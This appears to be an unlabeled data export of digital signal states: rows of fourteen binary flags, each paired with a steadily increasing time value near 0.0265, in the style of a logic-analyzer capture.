0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6388332e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6388356e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6388380e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6388404e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6388428e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6388452e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6388480e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6388504e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6388532e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6388556e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6388580e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6388608e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6388628e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6388652e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6388680e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6388708e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,2.6513528e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,2.6513752e-02 1,0,0,1,1,0,0,0,0,0,0,1,0,1,2.6513780e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,2.6513804e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,2.6514100e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,2.6514124e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,2.6514148e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,2.6514176e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,2.6514200e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,2.6514228e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,2.6514252e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,2.6514276e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,2.6514300e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,2.6514324e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,2.6514348e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6514364e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6514372e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6514400e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6514424e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6514452e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6514476e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6514500e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6514524e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6514548e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6514576e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6514600e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6514628e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6514652e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6514676e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6514700e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6514724e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6514748e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6514772e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6514796e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6514820e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6514848e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6514872e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6514900e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6514924e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6514948e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6514972e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6514996e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6515020e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6515048e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6515072e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6515100e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6515124e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6515148e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6515172e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6515196e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6515220e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6515248e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6515272e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6515300e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6515324e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6515348e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6515372e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,2.6515380e-02 1,0,0,1,1,1,0,0,0,1,0,0,1,0,2.6515424e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,2.6515448e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6515456e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6515476e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6515500e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6515524e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6515548e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6515572e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6515600e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6515628e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6515652e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6515676e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6515700e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6515748e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6515776e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,2.6515780e-02 1,0,0,1,1,1,0,0,0,1,0,0,1,0,2.6515800e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,2.6515828e-02 1,0,0,1,1,1,0,0,0,0,0,0,0,0,2.6515832e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6515836e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6515852e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6515876e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6515900e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6515924e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6515948e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6515976e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6516000e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6516028e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6516052e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6516076e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6516100e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6516124e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6516148e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6516176e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6516200e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,2.6516228e-02 1,0,0,1,1,1,0,0,0,1,0,0,1,0,2.6516276e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,2.6516300e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6516308e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6516324e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6516348e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6516376e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6516400e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6516428e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6516452e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6516476e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6516500e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6516528e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6516552e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6516580e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6516604e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6516628e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6516652e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6516676e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6516700e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6516756e-02 1,0,0,1,1,0,0,0,0,1,0,0,0,0,2.6516780e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,2.6516784e-02 1,0,0,1,1,1,0,0,0,1,0,0,1,0,2.6516804e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,2.6516828e-02 1,0,0,1,1,1,0,0,0,1,0,0,1,0,2.6516876e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,2.6516900e-02 1,0,0,1,1,1,0,0,0,0,0,0,0,0,2.6516908e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6516912e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6516928e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6516952e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6516980e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6517004e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6517028e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6517052e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6517076e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6517100e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6517128e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6517152e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6517180e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6517204e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6517228e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6517252e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6517276e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6517300e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6517328e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6517352e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6517380e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6517404e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6517428e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6517452e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6517476e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6517500e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6517528e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6517552e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6517580e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6517604e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6517628e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6517652e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6517676e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6517700e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6517728e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6517752e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6517780e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6517804e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6517828e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6517852e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6517876e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6517900e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6517928e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6517952e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6517980e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6518004e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6518028e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6518052e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6518076e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6518108e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6518132e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6518152e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6518180e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6518204e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6518228e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6518252e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6518276e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6518308e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6518328e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6518352e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6518380e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6518404e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6518428e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6518452e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6518476e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6518500e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6518528e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6518552e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6518580e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6518604e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6518628e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6518652e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6518676e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6518700e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6518728e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6518752e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6518780e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6518804e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6518828e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6518852e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6518876e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6518900e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6518928e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6518952e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6518980e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6519004e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6519028e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6519052e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6519076e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6519100e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6519128e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6519152e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6519180e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6519204e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6519228e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6519252e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6519276e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6519300e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6519328e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6519352e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6519380e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6519404e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6519428e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6519452e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6519476e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6519500e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6519528e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6519552e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6519580e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6519604e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6519628e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6519652e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6519676e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6519700e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6519728e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6519752e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6519780e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6519804e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6519828e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6519852e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6519876e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6519900e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6519928e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6519952e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6519980e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6520004e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6520028e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6520052e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6520076e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6520100e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6520128e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6520152e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6520180e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6520204e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6520228e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6520252e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6520276e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6520300e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6520328e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6520352e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6520380e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6520404e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6520428e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6520452e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6520484e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6520508e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6520532e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6520556e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6520580e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6520608e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,2.6645436e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,2.6645604e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,2.6645624e-02 0,1,0,1,1,0,0,0,0,0,0,1,0,1,2.6645652e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,2.6645676e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,1,2.6645956e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,2.6645988e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,1,2.6646036e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,2.6646060e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,1,2.6646084e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,2.6646108e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,1,2.6646132e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,2.6646156e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,1,2.6646184e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,2.6646204e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,1,2.6646260e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6646268e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6646284e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6646308e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6646332e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6646384e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6646404e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6646436e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6646460e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6646484e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6646508e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6646532e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6646556e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6646584e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6646604e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6646660e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6646684e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6646708e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6646732e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6646784e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6646804e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6646836e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6646860e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6646908e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6646932e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6646984e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6647004e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6647060e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6647084e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6647108e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6647132e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6647156e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6647180e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6647204e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6647236e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6647284e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6647308e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6647356e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6647384e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6647436e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6647460e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6647484e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6647508e-02 0,1,0,1,1,0,0,0,0,1,0,0,0,0,2.6647512e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6647516e-02 0,1,0,1,1,1,0,0,0,1,0,0,1,0,2.6647556e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6647584e-02 0,1,0,1,1,1,0,0,0,0,0,0,0,0,2.6647588e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6647592e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6647608e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6647636e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6647660e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6647684e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6647708e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6647732e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6647756e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6647780e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6647836e-02 0,1,0,1,1,0,0,0,0,1,0,0,0,0,2.6647860e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6647864e-02 0,1,0,1,1,1,0,0,0,1,0,0,1,0,2.6647884e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6647908e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6647916e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6647932e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6647956e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6647984e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6648008e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6648060e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6648084e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6648108e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6648132e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6648184e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6648208e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6648260e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6648284e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6648332e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6648356e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6648384e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6648408e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6648436e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6648460e-02 0,1,0,1,1,1,0,0,0,1,0,0,1,0,2.6648508e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6648532e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6648540e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6648556e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6648584e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6648636e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6648660e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6648708e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6648732e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6648784e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6648808e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6648836e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6648860e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6648884e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6648908e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6648932e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6648956e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6649008e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6649036e-02 0,1,0,1,1,1,0,0,0,1,0,0,1,0,2.6649060e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6649084e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6649092e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6649108e-02 